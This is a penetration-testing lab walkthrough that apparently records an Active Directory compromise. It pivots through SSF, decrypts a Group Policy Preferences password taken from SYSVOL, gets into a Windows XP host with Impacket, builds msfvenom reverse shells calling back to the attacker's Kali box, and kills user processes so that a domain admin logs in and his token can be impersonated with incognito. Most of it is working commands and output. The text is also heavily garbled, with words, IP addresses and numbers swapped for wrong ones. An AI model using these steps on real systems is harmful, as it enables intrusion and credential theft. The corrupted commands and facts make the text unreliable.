C:\Lab27>arp-scan.exe -t 192.168.200.1/24 arp-browse.exe -t 192.168.200.i/24 Reply that 00:50:56:A1:E0:26 is 192.168.200.1 in 6.981474 Reply that 00:50:56:A1:52:8F is 192.168.200.100 in fifteen.713799 Reply that 00:fifty:56:A1:DD:E3 is 192.168.200.200 in xvi.038212 Reply that 00:50:56:A1:F9:6D is 192.168.200.210 in 0.070679 Answer that 00:50:56:A1:F9:6D is 192.168.200.255 in 0.057410 The host is at 210, while the DC is at 100. So the just thing left to check is 200. Only before that permit'southward set up up the port proxy forwarder on the motorcar. Remember this involves robocopying SSF-Win32 after using Impacket's smbserver to run a publicly accessible shared folder on Kali. Haven't washed in some time and so I had to check some old posts 🙂
C:\Lab27>robocopy \\172.sixteen.111.thirty\Lab27\SSF-Win32 C:\Lab27\SSF-Win32 /e robocopy \\172.16.111.30\Lab27\SSF-Win32 C:\Lab27\SSF-Win32 /due east
Then ready upwards our SSF listener on Kali
root@Kali:~/Tools/SSF-Linux# ./ssfd -p 11111
so run the SSF-Win32 to connect back
C:\Lab27\SSF-Win32>ssf.exe -F 22222 -p 11111 172.16.111.30 ssf.exe -F 22222 -p 11111 172.16.111.xxx
Our Kali SSF listener shows
[2019-06-01T19:00:30+08:00] [info] [config] [tls] CA cert path: [2019-06-01T19:00:thirty+08:00] [info] [config] [tls] cert path: [2019-06-01T19:00:xxx+08:00] [info] [config] [tls] key path: [2019-06-01T19:00:30+08:00] [info] [config] [tls] central password: <> [2019-06-01T19:00:30+08:00] [info] [config] [tls] dh path: [2019-06-01T19:00:30+08:00] [info] [config] [tls] cipher suite: [2019-06-01T19:00:thirty+08:00] [info] [config] [http proxy] [2019-06-01T19:00:thirty+08:00] [info] [config] [socks proxy] [2019-06-01T19:00:30+08:00] [info] [config] [circuit] [2019-06-01T19:00:30+08:00] [info] [ssfd] listening on <*:11111> [2019-06-01T19:00:thirty+08:00] [info] [ssfd] running (Ctrl + C to end) [2019-06-01T19:01:20+08:00] [info] [microservice] [stream_listener]: frontward TCP connections from <127.0.0.1:22222> to 22222
The in a higher place works with an /etc/proxychains.conf configuration of:
socks4 127.0.0.ane 22222
This next stride strictly isn't necessary but I did it simply to see what kind of AD is running
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains nmap -sTV -sC -n -Pn 192.168.200.100 ProxyChains-three.1 (http://proxychains.sf.cyberspace) Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 12:03 +08 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over two.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over ii.3 seconds, decreasing to 2.0 RTTVAR has grown to over ii.3 seconds, decreasing to two.0 RTTVAR has grown to over 2.iii seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.iii seconds, decreasing to 2.0 RTTVAR has grown to over two.3 seconds, decreasing to ii.0 RTTVAR has grown to over 2.3 seconds, decreasing to ii.0 Stats: 0:35:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About fourteen.l% washed; ETC: 16:06 (3:27:39 remaining) Stats: 0:35:44 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Browse Connect Browse Timing: About 14.lxx% done; ETC: 16:06 (three:27:15 remaining)
Oops that's taking besides long (iii+ hours) so permit's do a very selective port scan.
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains nmap -n -Pn -sTV -sC -p53,88,135,137,139,389,445,464,593,636,3268,3269,3389,5722,9389,47001,49157 192.168.200.100 ProxyChains-3.1 (http://proxychains.sf.cyberspace) Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 18:23 +08 Nmap scan report for 192.168.200.100 Host is up (1.4s latency). PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.0.6001 (17714726) (Windows Server 2008 SP1) | dns-nsid: |_ bind.version: Microsoft DNS vi.0.6001 (17714726) 88/tcp open up kerberos-sec Microsoft Windows Kerberos (server fourth dimension: 2019-06-02 x:25:28Z) 135/tcp open msrpc Microsoft Windows RPC 137/tcp closed netbios-ns 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: examplead.lan, Site: Default-Offset-Site-Name) 445/tcp open microsoft-ds Windows Server (R) 2008 Datacenter 6001 Service Pack 1 microsoft-ds 464/tcp open up kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP ane.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Agile Directory LDAP (Domain: examplead.lan, Site: Default-First-Site-Proper name) 3269/tcp open up tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Service |_ssl-appointment: 2019-06-02T10:27:40+00:00; -4s from scanner fourth dimension. 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp closed adws 47001/tcp closed winrm 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP one.0 Service Info: Host: DC01; Os: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 Host script results: |_clock-skew: mean: 1h45m11s, deviation: 3h30m29s, median: -2s | smb-os-discovery: | OS: Windows Server (R) 2008 Datacenter 6001 Service Pack 1 (Windows Server (R) 2008 Datacenter half-dozen.0) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Calculator name: DC01 | NetBIOS estimator proper noun: DC01\x00 | Domain proper noun: examplead.lan | Forest name: examplead.lan | FQDN: DC01.examplead.lan |_ Organisation fourth dimension: 2019-06-02T03:27:46-07:00 | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-manner: | 2.02: |_ Bulletin signing enabled and required | smb2-time: | date: 2019-06-02 18:28:21 |_ start_date: 2019-06-01 05:45:59 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP accost (1 host upwards) scanned in 427.07 seconds
So SMB signing is enabled, then the typical Responder attacks won't piece of work here. Nosotros become information that Kerberos is running but Kerberoasting led to a dead stop (see beneath). Now what if we checked the network shares on the Advert server? Why do this at all? ADsecurity has a good postal service on this here.
Basically in old (pre-2014) days, Microsoft deployed Grouping Policy Preferences as a tool for changing the local administrator passwords on many computers all joined in ane Ad domain. Equally ADsecurity explains:
One of my customers recently needed to alter the local administrator countersign on several hundred Windows 7 workstations and was trying to determine the best method: PowerShell script or Group Policy Preferences.
The easy answer is to use Group Policy Preferences since it has a built-in machinery for irresolute/managing local estimator passwords. The problem is that while the countersign in Group Policy Preferences is encrypted using AES 256, the private key for the encryption is posted on MSDN.
The encrypted local admin passwords are stored in a readable share on the Ad server, specifically on the SYSVOL share without any special tools. To make matters worse for some reason Microsoft published the private key for decrypting it on MSDN, effectively turning them into plaintext password files. Microsoft eventually released a patch in 2014 , naming the vulnerability MS14-025 but unpatched systems still remain. The passwords are stored somewhere in Groups.xml in the SYSVOL share. You tin read through 0xdf'due south guide or IPPSec's walkthrough to the Agile box on HTB to come across how they did it only I'll practice it below.
Commencement nosotros look for the SYSVOL share on the DC.
C:\Users\SecondUser\Desktop>net view dc01.examplead.lan internet view dc01.examplead.lan Shared resources at dc01.examplead.lan Share name Type Used as Annotate ------------------------------------------------------------------------------- FooResearch Disk NETLOGON Disk Logon server share SYSVOL Deejay Logon server share The command completed successfully. Peachy it exists. At present permit'south cheque whats inside.
C:\Users\SecondUser\Desktop>dir \\dc01.examplead.lan\SysVOL dir \\dc01.examplead.lan\SysVOL Volume in drive \\dc01.examplead.lan\SysVOL has no label. Volume Serial Number is 6C66-920E Directory of \\dc01.examplead.lan\SysVOL 06/24/2014 03:19 AM DIR . 06/24/2014 03:xix AM DIR .. 06/24/2014 03:nineteen AM JUNCTION examplead.lan [C:\Windows\SYSVOL\domain] 0 File(s) 0 bytes 3 Dir(southward) 711,684,096 bytes free C:\Users\SecondUser\Desktop>dir \\dc01.examplead.lan\SysVOL\examplead.lan dir \\dc01.examplead.lan\SysVOL\examplead.lan Book in drive \\dc01.examplead.lan\SysVOL has no characterization. Volume Serial Number is 6C66-920E Directory of \\dc01.examplead.lan\SysVOL\examplead.lan 06/24/2014 03:21 AM DIR . 06/24/2014 03:21 AM DIR .. 07/31/2014 05:10 AM DIR Policies 06/24/2014 03:xix AM DIR scripts 0 File(due south) 0 bytes 4 Dir(s) 711,684,096 bytes gratis C:\Users\SecondUser\Desktop>dir \\dc01.examplead.lan\SysVOL\examplead.lan\Policies dir \\dc01.examplead.lan\SysVOL\examplead.lan\Policies Book in drive \\dc01.examplead.lan\SysVOL has no label. Book Serial Number is 6C66-920E Directory of \\dc01.examplead.lan\SysVOL\examplead.lan\Policies 07/31/2014 05:10 AM DIR . 07/31/2014 05:ten AM DIR .. 06/24/2014 03:twenty AM DIR {31B2F340-016D-11D2-945F-00C04FB984F9} 07/31/2014 05:11 AM DIR {69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4} 06/24/2014 03:twenty AM DIR {6AC1786C-016F-11D2-945F-00C04fB984F9} 06/24/2014 06:43 AM DIR {7635CC99-2423-4809-A2E6-20A9BB8294BB} 07/17/2014 05:40 AM DIR {9E4B6CF5-DE26-4631-A4A6-D0C845998366} 0 File(south) 0 bytes 7 Dir(due south) 711,684,096 bytes complimentary At this point it's clear that we have to practice a search for the file unless we desire to bank check out sub-directory'southward rabbit hole manually. On Windows Server 2003 and later, in that location is an alternative to dir /s, namely the where control. The syntax for using it is
where /r [path to search recursively] [file to search]
the /r switch basically tells the control to search recursively ie. all search all subdirectories and sub-subdirectories for the file. In our case the control would exist
C:\Users\SecondUser\Desktop>where /r \\dc01.examplead.lan\SysVOL\examplead.lan\Policies Groups.xml where /r \\dc01.examplead.lan\SysVOL\examplead.lan\Policies Groups.xml \\dc01.examplead.lan\SysVOL\examplead.lan\Policies\{69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}\Automobile\Preferences\Groups\Groups.xml \\dc01.examplead.lan\SysVOL\examplead.lan\Policies\{9E4B6CF5-DE26-4631-A4A6-D0C845998366}\Auto\Preferences\Groups\Groups.xml Then nosotros found two files. Let's run across what they have
I screenshot because otherwise I'd have to remove all the triangle brackets. From the above, one of the files contain a Administrator user named LADM with the password
cpassword="0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY"
To fissure it we plough to Kali's gpp-decrypt utility
root@Kali:~/PTP/5.iii XSS/Lab 27# gpp-decrypt 0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY /usr/bin/gpp-decrypt:21: alarm: abiding OpenSSL::Cipher::Zero is deprecated Pm2fUXScqI Wow. We got the key. Now nosotros demand to find a lock that fits it. From the above arp-scan we identified 192.168.200.200 as a potential target in the same LAN. Let'southward endeavor to login with the credentials using Impacket'southward PsExec. For more than reading on connecting remotely via SMB credentials run into this
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains psexec.py LADM:Pm2fUXScqI@192.168.200.200 ProxyChains-3.i (http://proxychains.sf.net) Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 192.168.200.200..... [*] Found writable share ADMIN$ [*] Uploading file KywbiqYd.exe [*] Opening SVCManager on 192.168.200.200..... [*] Creating service mpsg on 192.168.200.200..... [*] Starting service mpsg..... [*] Opening SVCManager on 192.168.200.200..... [*] Stopping service mpsg..... [*] Removing service mpsg..... [*] Removing file KywbiqYd.exe.....
Unfortunately we didn't get a shell. Not to worry nosotros tin nonetheless try smbexec.py and wmiexec.py Both these work and give us a semi-interactive shell. You might wonder what's that. In a previous post we used it. An explanation of how it works is here, which basically says that there isn't an actual shell running as process on the target but rather drops commands entered as a .bat file, then pipes the output back to STDOUT and deletes the .bat file. A kinda smart way of evading persistence detection or people who monitor processes.
Running smbexec gives
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains smbexec.py LADM:Pm2fUXScqI@192.168.200.200 ProxyChains-iii.one (http://proxychains.sf.net) Impacket v0.ix.19-dev - Copyright 2019 SecureAuth Corporation [!] Launching semi-interactive shell - Careful what you execute C:\WINDOWS\system32>whoami 'whoami' is non recognized as an internal or external command, operable program or batch file. C:\WINDOWS\system32>echo %userdomain%\%userame% \ C:\WINDOWS\system32>repeat %userdomain%\%username% \
Ok we got in but couldn't verify our user permissions or identity because the higher up didn't work. We must be on a very onetime Windows system, probably XP. At least we tin confirm we are in the target arrangement and connect dorsum to Kali.
C:\WINDOWS\system32>ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : PCClientXP Primary Dns Suffix . . . . . . . : examplead.lan Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : examplead.lan Ethernet adapter Local Area Connectedness: Connection-specific DNS Suffix . : Clarification . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Concrete Accost. . . . . . . . . : 00-50-56-A1-DD-E3 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.200.200 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.200.one DNS Servers . . . . . . . . . . . : 192.168.200.100 C:\WINDOWS\system32>ping 172.16.111.thirty Pinging 172.16.111.thirty with 32 bytes of data: Respond from 172.16.111.30: bytes=32 time=233ms TTL=63 Answer from 172.16.111.30: bytes=32 time=233ms TTL=63 Answer from 172.16.111.30: bytes=32 time=233ms TTL=63 Reply from 172.16.111.xxx: bytes=32 time=233ms TTL=63 Ping statistics for 172.16.111.30: Packets: Sent = 4, Received = four, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 233ms, Maximum = 233ms, Average = 233ms
Annotation that because the shell is "semi-interactive" nosotros cannot change the working directory and are forced to apply absolute rather than relative paths
C:\WINDOWS\system32>cd\ [-] You can't CD under SMBEXEC. Apply full paths.
We tin can confirm we are on the aforementioned network domain and that LADM exists as a local admin account
C:\WINDOWS\system32>net user /domain The asking will be candy at a domain controller for domain examplead.lan. User accounts for \\DC01.examplead.lan ------------------------------------------------------------------------------- Administrator exampleadm ExampleUser Guest krbtgt SecondUser The control completed with one or more errors. C:\WINDOWS\system32>internet user User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant LADM SUPPORT_388945a0 The control completed with i or more errors.
Here we cheque the details of what arrangement we're on
C:\WINDOWS\system32>systeminfo Host Name: PCCLIENTXP Os Name: Microsoft Windows XP Professional Os Version: 5.ane.2600 Service Pack three Build 2600 OS Manufacturer: Microsoft Corporation Bone Configuration: Fellow member Workstation OS Build Blazon: Uniprocessor Free Registered Owner: eLS Registered System: eLS Product ID: 76487-032-1797031-22304 Original Install Engagement: 2/eight/2012, i:34:32 PM Organization Upwards Fourth dimension: ii Days, 6 Hours, 22 Minutes, 31 Seconds System Manufacturer: VMware, Inc. Arrangement Model: VMware Virtual Platform Arrangement blazon: X86-based PC Processor(south): 1 Processor(s) Installed. [01]: x86 Family unit 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz BIOS Version: INTEL - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-u.s.;English (United States) Input Locale: en-us;English (United states) Time Zone: (GMT-08:00) Pacific Fourth dimension (US & Canada); Tijuana Total Physical Memory: 255 MB Bachelor Physical Retention: 132 MB Virtual Memory: Max Size: ii,048 MB Virtual Memory: Available: 2,009 MB Virtual Memory: In Utilize: 39 MB Page File Location(s): C:\pagefile.sys Domain: examplead.lan Logon Server: N/A Hotfix(s): 3 Hotfix(southward) Installed. [01]: File ane [02]: Q147222 [03]: KB958644 - Update NetWork Card(s): i NIC(s) Installed. [01]: VMware Accelerated AMD PCNet Adapter Connection Name: Local Area Connection DHCP Enabled: No IP accost(es) [01]: 192.168.200.200
And also set which tells us a flake nigh the running environs
C:\Lab27>set set ALLUSERSPROFILE=C:\Documents and Settings\All Users CommonProgramFiles=C:\Programme Files\Common Files COMPUTERNAME=PCCLIENTXP ComSpec=C:\WINDOWS\system32\cmd.exe FP_NO_HOST_CHECK=NO NUMBER_OF_PROCESSORS=i Os=Windows_NT Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 79 Stepping 1, GenuineIntel PROCESSOR_LEVEL=half dozen PROCESSOR_REVISION=4f01 ProgramFiles=C:\Program Files PROMPT=$P$G SystemDrive=C: SystemRoot=C:\WINDOWS TEMP=C:\WINDOWS\TEMP TMP=C:\WINDOWS\TEMP USERPROFILE=C:\Documents and Settings\LocalService windir=C:\WINDOWS
Nosotros at present have enough information to piece together a layout of what the network diagram looks similar
We can of course re-create over Kali's whoami.exe to check our username on the system.
C:\WINDOWS\system32>re-create \\172.sixteen.111.30\Lab27\whoami.exe C:\Lab27 1 file(s) copied. C:\WINDOWS\system32>C:\Lab27\whoami.exe NT Authorisation\SYSTEM
And then nosotros are already Organization. If nosotros aren't it should be possible to escalate to Arrangement with PsExec since LADM (which we logged in with) is already in the Administrators localgroup
C:\Lab27>whoami.exe whoami.exe PCCLIENTXP\LADM C:\Lab27>net user LADM cyberspace user LADM User name LADM Full Name LADM Comment User'south annotate Country lawmaking 000 (System Default) Account active Yeah Account expires Never Password last set 7/31/2014 five:12 AM Password expires Never Password changeable 8/ane/2014 5:12 AM Password required Yep User may change password Yes Workstations immune All Logon script User profile Home directory Last logon 6/ane/2019 8:02 AM Logon hours allowed All Local Group Memberships *Administrators Global Grouping memberships *None The command completed successfully.
Ok, so to upgrade to a more stable shell instead a semi-interactive one, but generate a reverse shell via msfvenom, run and catch information technology with a listener.
root@Kali:~/PTP/v.iii XSS/Lab 27# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=172.sixteen.111.30 LPORT=4499 -f exe -o 200_shell.exe No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes Saved as: 200_shell.exe C:\WINDOWS\system32>copy \\172.16.111.30\Lab27\200_shell.exe C:\Lab27\200_shell.exe 1 file(due south) copied.
Right. So what can we do hither as SYSTEM? Remember the goal of the lab is to get the domain admin business relationship or credentials. We have System but these are local not domain rights. So what can we do?
One manner we tin can do this is to check for token credentials left on the system when the domain admin has logged in. We can exercise this via Meterpreter as washed earlier but recall we are restricting its use. Then allow's run across if we can run the incognito extension as standalone without Meterpreter. MWRLabs released incognito2 here as standalone executable.
At that place are some guides on how to practise this, this is dated for >ten yrs ago (!) but still relevant today. SANS has a skillful explanation of what admission tokens are hither. Ok let's come across how to apply incognito.
Allow's get-go listing the tokens
C:\Lab27\incognito2>incognito.exe list_tokens -u incognito.exe list_tokens -u [*] Enumerating tokens [*] Listing unique users found Delegation Tokens Available ============================================ EXAMPLEAD\ExampleUser NT Authorisation\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT Dominance\Organisation Impersonation Tokens Available ============================================ EXAMPLEAD\Administrator NT Potency\Bearding LOGON Administrative Privileges Available ============================================ SeAssignPrimaryTokenPrivilege SeCreateTokenPrivilege SeTcbPrivilege SeTakeOwnershipPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeImpersonatePrivilege SeLoadDriverPrivilege
From the in a higher place we see only one other domain user. Let's do check if that is domain admin. Doesn't look similar it.
C:\Lab27\incognito2>net user ExampleUser /domain net user ExampleUser /domain The asking will be candy at a domain controller for domain examplead.lan. User name ExampleUser Full Name Example User Comment User's comment Country code 000 (Arrangement Default) Account active Yes Business relationship expires Never Countersign last set half-dozen/24/2014 6:14 AM Countersign expires Never Password changeable half-dozen/25/2014 6:fourteen AM Password required Aye User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon six/1/2019 3:11 AM Logon hours allowed All Local Group Memberships Global Group memberships *Case Group *Domain Users The command completed successfully.
Yep confirmed its just domain user. What about 'exampleadm' which nosotros saw above?
C:\WINDOWS\system32>net user exampleadm /domain The asking volition be processed at a domain controller for domain examplead.lan. User name exampleadm Full Proper name exampleadm Comment User'southward comment Country code 000 (System Default) Business relationship agile Yes Account expires Never Password last set 7/17/2014 6:39 AM Password expires Never Password child-bearing 7/18/2014 half dozen:39 AM Countersign required Yeah User may modify password Yep Workstations allowed All Logon script User profile Habitation directory Terminal logon 9/17/2014 vi:12 AM Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *Group Policy Creator *Domain Admins *Enterprise Admins *Domain Users *Schema Admins The command completed successfully.
Yep thats what we desire to impersonate. Unfortunately the list of tokens available higher up didn't include exampleadm. What tin we do? We could either look for the domain admin to eventually login, or we could make him login. The domain admin is likely some sys admin who may login to investigate problems raised by (pesky) users such as programs terminating unexpectedly which is something we could do equally SYSTEM.
Let's brandish a list of processes running with the users
C:\Lab27>tasklist /v tasklist /v Paradigm Proper noun PID Session Name Session# Mem Usage Status User Name CPU Time Window Championship ========================= ====== ================ ======== ============ =============== ================================================== ============ ======================================================================== Arrangement Idle Process 0 Console 0 28 K Running NT AUTHORITY\Organisation five:07:37 N/A System 4 Panel 0 236 M Running NT AUTHORITY\SYSTEM 0:00:05 North/A smss.exe 556 Console 0 384 Thousand Running NT Potency\Organisation 0:00:00 N/A csrss.exe 620 Console 0 3,396 1000 Running NT Authority\SYSTEM 0:00:01 Due north/A winlogon.exe 644 Panel 0 6,056 1000 Running NT Say-so\Organisation 0:00:01 N/A services.exe 688 Console 0 5,952 K Running NT Dominance\SYSTEM 0:00:02 Due north/A lsass.exe 700 Panel 0 4,088 K Running NT Potency\Arrangement 0:00:01 N/A vmacthlp.exe 864 Console 0 2,324 1000 Running NT AUTHORITY\Organisation 0:00:00 North/A svchost.exe 876 Console 0 4,904 K Running NT AUTHORITY\Organisation 0:00:00 Due north/A svchost.exe 956 Console 0 4,104 Thousand Running NT Potency\NETWORK SERVICE 0:00:00 N/A svchost.exe 1040 Panel 0 23,532 Yard Running NT AUTHORITY\Organization 0:00:19 Organisation Amanuensis COM WINDOW svchost.exe 1104 Console 0 three,384 G Running NT Authority\NETWORK SERVICE 0:00:00 N/A svchost.exe 1152 Panel 0 4,332 K Running NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A spoolsv.exe 1444 Console 0 4,336 Chiliad Running NT AUTHORITY\SYSTEM 0:00:00 North/A vmtoolsd.exe 1776 Console 0 10,128 G Running NT Authorization\Organization 0:00:01 Due north/A explorer.exe 1924 Panel 0 xi,800 K Running EXAMPLEAD\ExampleUser 0:00:00 Northward/A vmtoolsd.exe 220 Console 0 viii,220 Chiliad Running EXAMPLEAD\ExampleUser 0:00:01 N/A ctfmon.exe 256 Console 0 2,792 One thousand Running EXAMPLEAD\ExampleUser 0:00:00 North/A cmd.exe 316 Console 0 1,556 M Running EXAMPLEAD\ExampleUser 0:00:00 Due north/A cmd.exe 324 Console 0 ii,448 Thousand Running EXAMPLEAD\ExampleUser 0:00:00 N/A LegApp.EXE 364 Console 0 2,216 G Running EXAMPLEAD\ExampleUser 0:00:00 N/A logon.scr 160 Console 0 1,796 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A cmd.exe 752 Console 0 2,368 Grand Running NT AUTHORITY\SYSTEM 0:00:00 C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\execute.bat 200_shell.exe 1416 Console 0 i,540 K Running NT Authority\Organisation 0:00:00 Northward/A cmd.exe 592 Console 0 2,632 M Running NT AUTHORITY\SYSTEM 0:00:00 C:\WINDOWS\system32\cmd.exe - tasklist /five tasklist.exe 348 Console 0 four,140 K Running NT AUTHORITY\SYSTEM 0:00:00 OleMainThreadWndName wmiprvse.exe 1684 Console 0 5,528 K Running NT Authorization\NETWORK BTW I too tried wmic process instead. Guess what that did?
C:\Lab27>wmic procedure wmic process Delight wait while WMIC is being installed.
Yeah. So personally I would wmic commands unless necessary. So from the in a higher place job list nosotros see some processes run past ExampleUser, a domain user. Let's effort killing those processes.
C:\Lab27\incognito2>taskkill /F /PID 316 taskkill /F /PID 316 SUCCESS: The process with PID 316 has been terminated. C:\Lab27\incognito2>taskkill /F /PID 324 taskkill /F /PID 324 SUCCESS: The process with PID 324 has been terminated. C:\Lab27\incognito2>taskkill /F /PID 256 taskkill /F /PID 256 SUCCESS: The process with PID 256 has been terminated. C:\Lab27\incognito2>taskkill /F /PID 220 taskkill /F /PID 220 SUCCESS: The procedure with PID 220 has been terminated.
At this point the domain admin exampleadm should have logged in via cmd to see whats upwards. If not we can try deleting those programs above like LegApp.exe to provoke the user into alerting the user.
C:\Lab27\incognito>tasklist /v tasklist /v Image Name PID Session Name Session# Mem Usage Condition User Proper noun CPU Time Window Title ========================= ====== ================ ======== ============ =============== ================================================== ============ ======================================================================== Arrangement Idle Procedure 0 Console 0 28 K Running NT AUTHORITY\SYSTEM 2:34:56 N/A System 4 Console 0 236 G Running NT Authorization\Organization 0:00:04 N/A smss.exe 556 Console 0 388 K Running NT Authorisation\Organisation 0:00:00 N/A csrss.exe 620 Panel 0 3,280 M Running NT AUTHORITY\SYSTEM 0:00:01 North/A winlogon.exe 644 Console 0 6,404 K Running NT Say-so\SYSTEM 0:00:01 N/A services.exe 688 Console 0 5,964 Chiliad Running NT AUTHORITY\Organisation 0:00:02 N/A lsass.exe 700 Console 0 4,948 K Running NT Authority\SYSTEM 0:00:02 N/A vmacthlp.exe 864 Console 0 2,324 K Running NT AUTHORITY\SYSTEM 0:00:00 Northward/A svchost.exe 876 Console 0 4,920 K Running NT Say-so\Organisation 0:00:00 Northward/A svchost.exe 956 Panel 0 four,112 Thou Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A svchost.exe 1040 Console 0 21,036 K Running NT AUTHORITY\SYSTEM 0:00:09 System Agent COM WINDOW svchost.exe 1096 Console 0 iii,388 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 Due north/A svchost.exe 1132 Console 0 four,332 Yard Running NT Potency\LOCAL SERVICE 0:00:00 Northward/A spoolsv.exe 1452 Console 0 four,336 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A explorer.exe 1872 Console 0 11,804 G Running EXAMPLEAD\ExampleUser 0:00:00 N/A vmtoolsd.exe 1912 Console 0 x,092 K Running NT AUTHORITY\Arrangement 0:00:01 N/A logon.scr 764 Console 0 one,796 One thousand Running EXAMPLEAD\ExampleUser 0:00:00 Due north/A cmd.exe 384 Console 0 2,468 Thousand Running NT AUTHORITY\Organization 0:00:00 C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\execute.bat 200_shell.exe 404 Panel 0 one,540 K Running NT Authorization\SYSTEM 0:00:00 N/A cmd.exe 1772 Console 0 two,832 1000 Running NT AUTHORITY\System 0:00:00 C:\WINDOWS\system32\cmd.exe - tasklist /v wmiprvse.exe 180 Console 0 5,884 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 North/A PSEXESVC.exe 1708 Console 0 iii,624 K Running NT AUTHORITY\SYSTEM 0:00:00 North/A cmd.exe 304 Panel 0 ii,316 K Running EXAMPLEAD\exampleadm 0:00:00 N/A tasklist.exe 1200 Panel 0 4,144 M Running NT Authorization\Organisation 0:00:00 OleMainThreadWndName Not bad. See the cmd.exd above run past exampleadm? At this point the tokens should have been loaded on the organisation. We accept two options at this point. We can either impersonate domain admin credentials of exampleadm, but this won't give us the password. It would essentially make usa exampleadm though. Or we could dump the token credentials and logon passwords using mimikatz. Permit'due south do both.
The former, impersonation is quite piece of cake since nosotros already have incognito installed and we don't need the passwords. Verify that exampleadm tokens are bachelor for impersonation
C:\Lab27\incognito2>incognito list_tokens -u incognito list_tokens -u [*] Enumerating tokens [*] Listing unique users found Delegation Tokens Available ============================================ EXAMPLEAD\ExampleAdm EXAMPLEAD\ExampleUser NT AUTHORITY\LOCAL SERVICE NT Potency\NETWORK SERVICE NT Authority\Organisation Impersonation Tokens Bachelor ============================================ EXAMPLEAD\Ambassador NT AUTHORITY\ANONYMOUS LOGON Administrative Privileges Available ============================================ SeAssignPrimaryTokenPrivilege SeCreateTokenPrivilege SeTcbPrivilege SeTakeOwnershipPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeImpersonatePrivilege SeLoadDriverPrivilege
Now we need a reverse trounce payload which incognito can run as the domain admin to connect back to Kali.
root@Kali:~/PTP/5.three XSS/Lab 27# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=172.16.111.xxx LPORT=4390 -f exe -o 200_dom_admin.exe No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes Saved as: 200_dom_admin.exe
Copy this over and and run this with incognito
C:\Lab27\incognito2>incognito.exe execute -c "EXAMPLEAD\ExampleAdm" C:\Lab27\200_dom_admin.exe incognito.exe execute -c "EXAMPLEAD\ExampleAdm" C:\Lab27\200_dom_admin.exe
If washed correctly nosotros should go a contrary shell every bit Kali
